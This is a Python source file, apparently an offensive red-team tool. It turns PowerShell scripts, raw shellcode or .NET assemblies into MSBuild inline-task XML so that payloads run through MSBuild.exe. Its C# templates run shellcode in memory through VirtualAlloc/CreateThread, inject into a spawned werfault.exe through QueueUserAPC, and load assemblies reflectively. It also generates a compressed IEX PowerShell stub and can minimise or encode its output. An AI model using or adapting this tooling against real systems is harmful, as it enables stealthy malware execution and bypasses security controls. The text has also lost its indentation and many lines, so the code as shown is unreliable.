# Red-Teaming script that will leverage MSBuild technique to convert Powershell input payload or
# .NET/CLR assembly EXE file into inline-task XML file that can be further launched by:
# %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
# or
# %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
# This script can embed following data within constructed CSharp Task:
# - Powershell code
# - raw Shellcode in a separate thread via CreateThread
# - .NET Assembly via Assembly.Load
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
import re
import os
import io
import sys
import gzip
import base64
import string
import pefile
import struct
import random
import binascii
import argparse
def getCompressedPayload(filePath, returnRaw = False):
out = io.BytesIO()
encoded = ''
with open(filePath, 'rb') as f:
inp = f.read()
with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
encoded = base64.b64encode(out.getvalue())
if returnRaw:
return encoded
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
return powershell
def getPayloadCode(payload):
return f'shellcode = "{payload}";'
payloadCode = '\n'
N = 50000
codeSlices = map(lambda i: payload[i:i+N], range(0, len(payload), N))
variables = []
num = 1
for code in codeSlices:
payloadCode += f'string shellcode{num} = "{code}";\n'
num += 1
concat = 'shellcode = ' + ' + '.join(variables) + ';\n'
payloadCode += concat
return payloadCode
def getInlineTask(module, payload, _format, apc, targetProcess):
templateName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
if len(module) > 0:
templateName = module
taskName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
payloadCode = getPayloadCode(payload.decode())
launchCode = ''
if _format == 'exe':
exeLaunchCode = string.Template('''<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.IO;
using System.IO.Compression;
using System.Text;
public class $templateName : Task {
public static byte[] DecompressString(string compressedText) {
byte[] data = Convert.FromBase64String(compressedText);
using (var ms = new MemoryStream(data)) {
using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
using (var decompressed = new MemoryStream()) {
return decompressed.ToArray();
public override bool Execute() {
string shellcode = "";
byte[] payload = DecompressString(shellcode);
Assembly asm = Assembly.Load(payload);
MethodInfo method = asm.EntryPoint;
object instance = asm.CreateInstance(method.Name);
method.Invoke(instance, new object[] { new string[] { } });
return true;
payloadCode = payloadCode,
templateName = templateName
launchCode = exeLaunchCode
elif _format == 'raw':
shellcodeLoader = ''
if not apc:
shellcodeLoader = string.Template('''<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.IO;
using System.IO.Compression;
using System.Text;
public class $templateName : Task {
private static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, UInt32 flAllocationType, UInt32 flProtect);
private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);
private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId );
private static extern bool CloseHandle(IntPtr hHandle);
private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds );
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static UInt32 MEM_RELEASE = 0x8000;
public static byte[] DecompressString(string compressedText) {
byte[] data = Convert.FromBase64String(compressedText);
using (var ms = new MemoryStream(data)) {
using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
using (var decompressed = new MemoryStream()) {
return decompressed.ToArray();
public override bool Execute() {
string shellcode = "";
byte[] payload = DecompressString(shellcode);
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(payload, 0, funcAddr, payload.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
VirtualFree(funcAddr, 0, MEM_RELEASE);
return true;
templateName = templateName,
payloadCode = payloadCode
# The below MSBuild template comes from:
# https://github.com/infosecn1nja/MaliciousMacroMSBuild
shellcodeLoader = string.Template('''<Task>
<Code Type="Class" Language="cs">
using System;
using System.Reflection;
using Microsoft.CSharp;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
using System.IO.Compression;
using System.Text;
public class $templateName : Task, ITask
public static byte[] DecompressString(string compressedText) {
byte[] data = Convert.FromBase64String(compressedText);
using (var ms = new MemoryStream(data)) {
using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
using (var decompressed = new MemoryStream()) {
return decompressed.ToArray();
public override bool Execute() {
string shellcode = "";
byte[] payload = DecompressString(shellcode);
string processpath = Environment.ExpandEnvironmentVariables(@"$targetProcess");
bool success = CreateProcess(null, processpath,
IntPtr.Zero, IntPtr.Zero, false,
IntPtr.Zero, null, ref si, out pi);
IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, payload.Length,MEM_COMMIT, PAGE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,payload,payload.Length, out bytesWritten);
IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
uint oldProtect = 0;
resultBool = VirtualProtectEx(pi.hProcess,resultPtr, payload.Length,PAGE_EXECUTE_READ, out oldProtect);
IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero);
IntPtr ThreadHandle = pi.hThread;
return true;
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static UInt32 PAGE_READWRITE = 0x04;
private static UInt32 PAGE_EXECUTE_READ = 0x20;
public enum ProcessAccessFlags : uint
All = 0x001F0FFF,
Terminate = 0x00000001,
CreateThread = 0x00000002,
VirtualMemoryOperation = 0x00000008,
VirtualMemoryRead = 0x00000010,
VirtualMemoryWrite = 0x00000020,
DuplicateHandle = 0x00000040,
CreateProcess = 0x000000080,
SetQuota = 0x00000100,
SetInformation = 0x00000200,
QueryInformation = 0x00000400,
QueryLimitedInformation = 0x00001000,
Synchronize = 0x00100000
public enum ProcessCreationFlags : uint
ZERO_FLAG = 0x00000000,
CREATE_NEW_CONSOLE = 0x00000010,
CREATE_NO_WINDOW = 0x08000000,
CREATE_SUSPENDED = 0x00000004,
DEBUG_PROCESS = 0x00000001,
DETACHED_PROCESS = 0x00000008,
public IntPtr hProcess;
public IntPtr hThread;
public uint dwProcessId;
public uint dwThreadId;
public struct STARTUPINFO
public uint cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public short wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
public enum ThreadAccess : int
TERMINATE = (0x0001) ,
SUSPEND_RESUME = (0x0002) ,
GET_CONTEXT = (0x0008) ,
SET_CONTEXT = (0x0010) ,
SET_INFORMATION = (0x0020) ,
SET_THREAD_TOKEN = (0x0080) ,
IMPERSONATE = (0x0100) ,
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
int dwThreadId);
[DllImport("kernel32.dll",SetLastError = true)]
public static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
int nSize,
out IntPtr lpNumberOfBytesWritten);
public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
Int32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll", SetLastError = true )]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(
ProcessAccessFlags processAccess,
bool bInheritHandle,
int processId
public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,
bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment,
string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
public static extern uint ResumeThread(IntPtr hThread);
public static extern uint SuspendThread(IntPtr hThread);
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
int dwSize, uint flNewProtect, out uint lpflOldProtect);
templateName = templateName,
payloadCode = payloadCode,
targetProcess = targetProcess
launchCode = shellcodeLoader
powershellLaunchCode = string.Template('''<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
using System.IO;
using System.IO.Compression;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Text;
public class $templateName : Task {
public static byte[] DecompressString(string compressedText) {
byte[] data = Convert.FromBase64String(compressedText);
using (var ms = new MemoryStream(data)) {
using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
using (var decompressed = new MemoryStream()) {
return decompressed.ToArray();
public override bool Execute() {
string shellcode = "";
byte[] payload = DecompressString(shellcode);
string decoded = System.Text.Encoding.UTF8.GetString(payload);
Runspace runspace = RunspaceFactory.CreateRunspace();
Pipeline pipeline = runspace.CreatePipeline();
return true;
templateName = templateName,
payloadCode = payloadCode
launchCode = powershellLaunchCode
template = string.Template('''<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
<Target Name="$taskName">
<$templateName />
<UsingTask TaskName="$templateName" TaskFactory="CodeTaskFactory"
AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
taskName = taskName,
templateName = templateName,
launchCode = launchCode
return template
def detectFileIsExe(filePath, forced = False):
pe = pefile.PE(filePath)
return True
except pefile.PEFormatError as e:
return False
def minimize(output):
output = re.sub(r'\s*\<\!\-\- .* \-\-\>\s*\n', '', output)
output = output.replace('\n', '')
output = re.sub(r'\s{2,}', ' ', output)
output = re.sub(r'\s+([^\w])\s+', r'\1', output)
output = re.sub(r'([^\w"])\s+', r'\1', output)
variables = {
'payload' : 'x',
'method' : 'm',
'asm' : 'a',
'instance' : 'o',
'pipeline' : 'p',
'runspace' : 'r',
'decoded' : 'd',
'MEM_COMMIT' : 'c1',
'MEM_RELEASE' : 'c3',
'funcAddr' : 'v1',
'hThread' : 'v2',
'threadId' : 'v3',
'lpAddress' : 'p1',
'dwSize' : 'p2',
'flAllocationType' : 'p3',
'flProtect' : 'p4',
'dwFreeType' : 'p5',
'lpThreadAttributes' : 'p6',
'dwStackSize' : 'p7',
'lpStartAddress' : 'p8',
'param' : 'p9',
'dwCreationFlags' : 'p10',
'lpThreadId' : 'p11',
'dwMilliseconds' : 'p12',
'hHandle' : 'p13',
'processpath' : 'p14',
'shellcode' : 'p15',
'resultPtr' : 'p16',
'bytesWritten' : 'p17',
'resultBool' : 'p18',
'ThreadHandle' : 'p19',
# Variables renaming tends to corrupt Base64 streams.
#for k, v in variables.items():
# output = output.replace(k, v)
return output
def opts(argv):
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
parser.add_argument('-o', '--output', metavar='PATH', default='', type=str, help = 'Output path where to write generated script. Default: stdout')
parser.add_argument('-n', '--module', metavar='NAME', default='', type=str, help = 'Specifies custom C# module name for the generated Task (for needs of shellcode loaders such as DotNetToJScript or Donut). Default: auto generated name.')
parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.')
parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.')
parser.add_argument('-e', '--exe', action='store_true',
help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread (VirtualAlloc + CreateThread)')
parser.add_argument('--queue-apc', action='store_true',
help = 'If --raw was specified, generate C# code template with CreateProcess + WriteProcessMemory + QueueUserAPC process injection technique instead of default CreateThread.')
parser.add_argument('--target-process', metavar='PATH', default=r'%windir%\system32\werfault.exe',
help = r'This option specifies target process path for remote process injection in --queue-apc technique. May use environment variables. May also contain command line for spawned process, example: --target-process "%%windir%%\system32\werfault.exe -l -u 1234"')
parser.add_argument('--only-csharp', action='store_true', help = 'Return generated C# code instead of MSBuild\'s XML.')
args = parser.parse_args()
if args.exe and args.raw:
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
args.target_process = args.target_process.replace("^%", '%')
return args
def main(argv):
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
if len(argv) < 2:
print('Usage: ./generateMSBuildXML.py [options] <inputFile>')
args = opts(argv)
_format = 'powershell'
if len(args.inputFile) > 0 and not os.path.isfile(args.inputFile):
sys.stderr.write('[?] Input file does not exists.\n\n')
return False
if args.exe:
if not detectFileIsExe(args.inputFile, args.exe):
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
return False
_format = 'exe'
sys.stderr.write('[?] File recognized as PE/EXE.\n\n')
with open(args.inputFile, 'rb') as f:
payload = f.read()
elif args.raw:
_format = 'raw'
sys.stderr.write('[?] File specified as raw Shellcode.\n\n')
with open(args.inputFile, 'rb') as f:
payload = f.read()
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
if args.inputFile.endswith('.exe'):
return False
payload = getCompressedPayload(args.inputFile, _format != 'powershell')
output = getInlineTask(args.module, payload, _format, args.queue_apc, args.target_process)
if args.only_csharp:
m = re.search(r'\<\!\[CDATA\[(.+)\]\]\>', output, re.M|re.S)
if m:
output = m.groups(0)[0]
if args.minimize:
output = minimize(output)
if args.encode:
if len(args.output) > 0:
with open(args.output, 'w') as f:
if len(args.output) > 0:
with open(args.output, 'w') as f:
msbuildPath = r'%WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
if 'PROGRAMFILES(X86)' in os.environ:
msbuildPath = r'%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe'
Execute this XML file like so:
{} file.xml
if __name__ == '__main__':